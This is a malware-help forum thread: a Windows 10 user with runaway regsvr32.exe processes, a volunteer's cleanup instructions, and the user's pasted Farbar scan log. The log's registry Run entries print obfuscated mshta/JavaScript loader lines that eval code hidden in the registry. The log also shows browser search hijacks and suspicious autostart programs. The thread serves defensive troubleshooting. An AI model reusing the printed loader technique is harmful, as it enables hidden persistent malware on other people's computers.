So I have had no previous problems. My brother gave me a computer that had Symantec and I removed it because it was taking up to my cpu as it was. So I switched to windows defender (I'm on windows 10) and i've had it for a month now. I have had no problems with it until yesterday my computer because really slow. I ran a defrag, and ran a virus scan through windows defender and they are still currently running. But there is a new process that ive never seen before, named regsvr32.exe, it is taking up a lot of my memory and cpu to the point where my computer is very slow! I did some research on the process and it claims to be one direct from Microsoft claiming that I require updates... I installed updates just 30 minutes ago and it is still there! I just took another look and there are now 3 processes claiming to be regsvr32.exe! I have no idea what i'm supposed to do!
Regsvr32.exe, running at 25-40% cpu usage and computer is really slow.
Started by
jake1master
, Dec 10 2015 05:20 PM
-
This topic is locked
#2
Posted 10 December 2015 - 07:13 PM
BrianDrab
-
- Malware Removal
-
- 3,591 posts
Trusted Helper
Hi. My name is Brian, and I would be happy to look into your issue.
- General Instructions -
- Please read all instructions and fixes thoroughly. Read the ENTIRE post BEFORE performing any steps so you understand all that needs to be done.
- I would advise printing any instructions for easy reference as some of the fixes may require you to boot in Safe mode. Access to these instructions may not be available in Safe Mode.
- Any fixes provided by myself are for this log file only and should not be used on any other systems.
- Do not run any other removal software or perform updates other than the ones I provide, as it will complicate the cleaning process.
- It's very likely that part of our cleanup will include emptying your recycle bin. If you use your recycle bin as an archive and do not wish this to be emptied, please let me know.
- It is also likely during our cleaning process that your internet browsing history will be removed. Your favorites will be untouched. If you don't want this to happen you need to let me know before running any steps so I can adjust my fixes accordingly.
- You have 4 days to reply to each post or the topic will be closed. You will be able to request that the topic be re-opened by sending me a PM (Personal Message) or PM a moderator.
- Please feel free to ask any questions, especially if you are having problems with my instructions.
- Save ALL Tools to your Desktop-
All tools that I have you download should be placed on the desktop unless otherwise stated. If you are familiar with how to save files to the desktop then you can skip this step.
Since you are continuing with this step then I assume you are unfamiliar with saving files to your desktop. As a result it's easiest if you configure your browser(s) to download any tools to the desktop by default. Please use the appropriate instructions below depending on the browser you are using.
Google Chrome - Click the "Customize and control Google Chrome" button in the upper right-corner of the browser.
Choose Settings. at the bottom of the screen click the
"Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.
Mozilla Firefox - Click the "Open Menu" button in the upper right-corner of the browser. 
Choose Options. In the downloads section, click the Browse button, click on the Desktop folder
and the click the "Select Folder" button. Click OK to get out of the Options menu.
Internet Explorer - Click the Tools menu in the upper right-corner of the browser. 
Select View downloads. Select the Options link in the lower left of the window. Click Browse and
select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.
NOTE: IE8 Does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.
- Finally Before We Start-
Removing malware is a complicated multiple step process, Please stay with me until I have declared your system clean. I strongly recommend you backup your personal files and folders. Although rare, attempting to remove malware can render your machine unbootable or cause data loss. Having backups of your data is your responsibility. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.
Let's take a look to see what is going on. Please provide logs.
Fresh Set of Logs Needed
1. Please download Farbar Recovery Scan Tool and save it to your Desktop.
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them.
Only one of them will run on your system, that will be the right version.
2. Right click on the file and select Run as administrator (If you don't have this option simply double-click the file to open). When the tool opens click Yes to disclaimer.
3. Press Scan button.
4. It will produce a log called FRST.txt in the same directory the tool is run from (which should be the desktop)
5. Please copy and paste log back here.
6. The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe). Please also paste that along with the FRST.txt into your reply.
Note: Please do not attach any logs unless specifically requested. It's easier if you simply copy and paste them into your reply. It's OK if you have to use more than one post to do so.
#3
Posted 10 December 2015 - 07:34 PM
jake1master
- Topic Starter
-
- Member
-
- 10 posts
Member
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:09-12-2015
Ran by PimpSlap (administrator) on PIMPSLAP-PC (10-12-2015 17:25:42)
Running from C:\Users\PimpSlap\Desktop
Loaded Profiles: PimpSlap (Available Profiles: PimpSlap)
Platform: Windows 10 Pro (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AMD) C:\Windows\System32\atiesrxx.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe
(Advanced Micro Devices) C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe
(Paramount Software UK Ltd) C:\Program Files\Macrium\Reflect\ReflectService.exe
() C:\Windows\System32\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Pixart Imaging Inc) C:\Windows\System32\TiltWheelMouse.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(© 2015 Microsoft Corporation) C:\Users\PimpSlap\AppData\Local\Microsoft\BingSvc\BingSvc.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\MOM.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16565_none_1162030161f5c19b\TiWorker.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [MouseDriver] => C:\WINDOWS\system32\TiltWheelMouse.exe [241152 2012-12-19] (Pixart Imaging Inc)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [14021336 2015-06-18] (Realtek Semiconductor)
HKLM-x32\...\Run: [NUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe [115048 2011-09-15] (Renesas Electronics Corporation)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-10-12] (Advanced Micro Devices, Inc.)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [BingSvc] => C:\Users\PimpSlap\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-11] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3696912 2014-03-04] (Disc Soft Ltd)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [GoogleChromeAutoLaunch_F884F1D7BC4601607AB3C7CEE5F5A322] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [741704 2015-12-04] (Google Inc.)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3638768 2015-12-01] (Electronic Arts)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [57981568 2015-09-27] (Skype Technologies S.A.)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [MyComGames] => C:\Users\PimpSlap\AppData\Local\MyComGames\MyComGames.exe [4235208 2015-10-21] (MY.COM B.V.)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013200 2015-12-08] (Valve Corporation)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Razer Comms] => C:\Program Files (x86)\Razer\Comms\RazerComms.exe [7010112 2015-10-15] () <===== ATTENTION
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [WindApp] => "C:\Users\PimpSlap\AppData\Roaming\Store\WindApp\WindApp.exe" /winstartup
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Selection Tools] => "C:\Users\PimpSlap\AppData\Roaming\WTools\Selection Tools\Selection Tools.exe" /winstartup
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**bfa63c00<*>] => mshta javascript:tg5Av9BK="F7FU0VZ6tm";Q2k=new%20ActiveXObject("WScript.Shell");TvtxAYj0="5EsUzy";nTa5r6=Q2k.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");MLUFn3l="dr9X";eval(nTa5r6);sKu0ZwI="RwVzRS (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**10548e12<*>] => mshta javascript:aRV1SL8ci="1Vhox";U1z3=new%20ActiveXObject("WScript.Shell");Kc5EZWrY="10ceYvbH";O4eIG=U1z3.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");pN6ujpZ6iw="cw";eval(O4eIG);jrwYec53i="SGxNZ (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\RunOnce: [Uninstall C:\Users\PimpSlap\AppData\Local\Microsoft\OneDrive\17.3.5892.0626\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\PimpSlap\AppData\Local\Microsoft\OneDrive\17.3.5892.0626\amd64"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\RunOnce: [Uninstall C:\Users\PimpSlap\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\PimpSlap\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64"
HKU\S-1-5-18\...\RunOnce: [AOD] => C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe [344064 2015-06-22] (Advanced Micro Devices, Inc.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\..\Interfaces\{6335a133-9766-455d-bbee-4cc54756b9d4}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{94b8a640-46be-4b3a-a238-e90e0be2bb84}: [NameServer] 75.75.75.75,75.75.76.76
Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_6
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_6
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://search.msn.com/spbasic.htm
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_6
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://search.msn.com/spbasic.htm
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_6
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://search.msn.com/spbasic.htm
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_6
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://search.msn.com/spbasic.htm
SearchScopes: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www-searching.com/search.aspx?s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f&site=shyosie&prd=set&q={searchTerms}
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll [2014-11-25] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll [2014-11-25] (Oracle Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\ssv.dll [2014-11-28] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\jp2ssv.dll [2014-11-28] (Oracle Corporation)
DPF: HKLM-x32 {B479199A-1242-4E3C-AD81-7F0DF801B4AE} hxxp://download.microsoft.com/download/C/9/C/C9C3D86D-84AC-4AF0-8584-842756A66467/MicrosoftDownloadManager.cab
FireFox:
========
FF ProfilePath: C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default
FF DefaultSearchEngine: Bing
FF SearchEngineOrder.3: Bing
FF SelectedSearchEngine: Bing
FF Homepage: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f
FF Keyword.URL: hxxp://www.bing.com/search?FORM=SK2JDF&PC=SK2J&q=
FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-19] ()
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-11-25] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-11-25] (Oracle Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2012-12-16] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-19] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-11-28] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-11-28] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-1710800545-2821560886-2955275411-1000: @my.com/Games -> C:\Users\PimpSlap\AppData\Local\MyComGames\NPMyComDetector.dll [2015-09-17] (My.com, Inc)
FF Plugin HKU\S-1-5-21-1710800545-2821560886-2955275411-1000: @nsroblox.roblox.com/launcher -> C:\Program Files (x86)\Roblox\Versions\version-80d6e12d52f3422b\\NPRobloxProxy.dll [2012-12-31] ( ROBLOX Corporation)
FF Plugin HKU\S-1-5-21-1710800545-2821560886-2955275411-1000: @nsroblox.roblox.com/launcher64 -> C:\Program Files (x86)\Roblox\Versions\version-80d6e12d52f3422b\\NPRobloxProxy64.dll [2012-12-31] ( ROBLOX Corporation)
FF Plugin HKU\S-1-5-21-1710800545-2821560886-2955275411-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\PimpSlap\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-06-08] (Unity Technologies ApS)
FF SearchPlugin: C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\searchplugins\bingp.xml [2015-07-16]
FF SearchPlugin: C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\searchplugins\smod.xml [2015-11-01]
FF Extension: No Name - C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\extensions\[email protected] [not found]
Chrome:
=======
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=en-us
CHR StartupUrls: Default -> "hxxp://google.com/"
CHR Profile: C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-08-11]
CHR Extension: (Assassin's Creed IV Black Flag) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\agibflpbghgmiinfaefgnldmfajdance [2015-10-12]
CHR Extension: (Google Docs) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-08-11]
CHR Extension: (Google Drive) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-20]
CHR Extension: (YouTube) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-26]
CHR Extension: (Tampermonkey) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2015-11-17]
CHR Extension: (User-Agent Switcher for Chrome) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\djflhoibgkdhkhhcedjiklpkjnoahfmg [2015-11-01]
CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2015-12-09]
CHR Extension: (Google Sheets) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-08-11]
CHR Extension: (Heroes & Generals) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2015-11-27]
CHR Extension: (Google Docs Offline) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-17]
CHR Extension: (AdBlock) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-12-03]
CHR Extension: (AgarioMods Evergreen Script) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhjgdbihpkphlammdaeicdemggagfbdo [2015-09-18]
CHR Extension: (Chrome Web Store Payments) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-11]
CHR Extension: (Gmail) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-11]
CHR HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AMD FUEL Service; C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe [344064 2015-06-22] (Advanced Micro Devices, Inc.) [File not signed]
R2 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [121856 2015-10-12] (Advanced Micro Devices) [File not signed]
S4 Beard; C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\DedicatedServer64\SpaceEngineersDedicated.exe [64512 2015-12-06] (Keen Software House) [File not signed]
S2 Boot Fook; C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\DedicatedServer64\SpaceEngineersDedicated.exe [64512 2015-12-06] (Keen Software House) [File not signed]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [245544 2015-09-03] (EasyAntiCheat Ltd)
S2 Lol; C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\DedicatedServer64\SpaceEngineersDedicated.exe [64512 2015-12-06] (Keen Software House) [File not signed]
S2 NewServer; C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\DedicatedServer64\SpaceEngineersDedicated.exe [64512 2015-12-06] (Keen Software House) [File not signed]
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2015-12-01] (Electronic Arts)
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76152 2015-08-11] ()
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2015-08-11] ()
S2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-09-23] ()
R2 ReflectService.exe; C:\Program Files\Macrium\Reflect\ReflectService.exe [3446224 2015-02-23] (Paramount Software UK Ltd)
S4 RzKLService; C:\Program Files (x86)\Razer\Razer Cortex\RzKLService.exe [129168 2015-07-14] (Razer Inc.)
S2 Test; C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\DedicatedServer64\SpaceEngineersDedicated.exe [64512 2015-12-06] (Keen Software House) [File not signed]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-09] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-09] (Microsoft Corporation)
S2 NetTcpHandler; C:\Users\PimpSlap\AppData\Roaming\NetService\netservice.exe -start [X]
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [297672 2015-10-12] (Advanced Micro Devices)
S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-28] (Advanced Micro Devices, Inc.)
R2 AODDriver4.3; C:\Program Files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-10-11] (Advanced Micro Devices)
R1 dtsoftbus01; C:\Windows\System32\drivers\dtsoftbus01.sys [283064 2015-02-01] (Disc Soft Ltd)
R3 ElcMouLFlt; C:\Windows\System32\drivers\ElcMouLFlt.sys [28648 2015-10-25] (ELECOM)
R3 ElcMouUFlt; C:\Windows\System32\drivers\ElcMouUFlt.sys [27624 2015-10-25] (ELECOM)
R1 HWiNFO32; C:\Windows\system32\drivers\HWiNFO64A.SYS [27552 2015-09-19] (REALiX™)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-17] (Realtek )
R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [37184 2015-09-22] (Razer, Inc.)
R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [129472 2015-09-08] (Razer, Inc.)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16056 2015-03-23] (SlimWare Utilities, Inc.)
R3 t_mouse.sys; C:\Windows\system32\DRIVERS\t_mouse.sys [6144 2012-12-19] ()
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2015-06-10] (Apple, Inc.) [File not signed]
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-09] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-09] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-09] (Microsoft Corporation)
U3 aspnet_state; no ImagePath
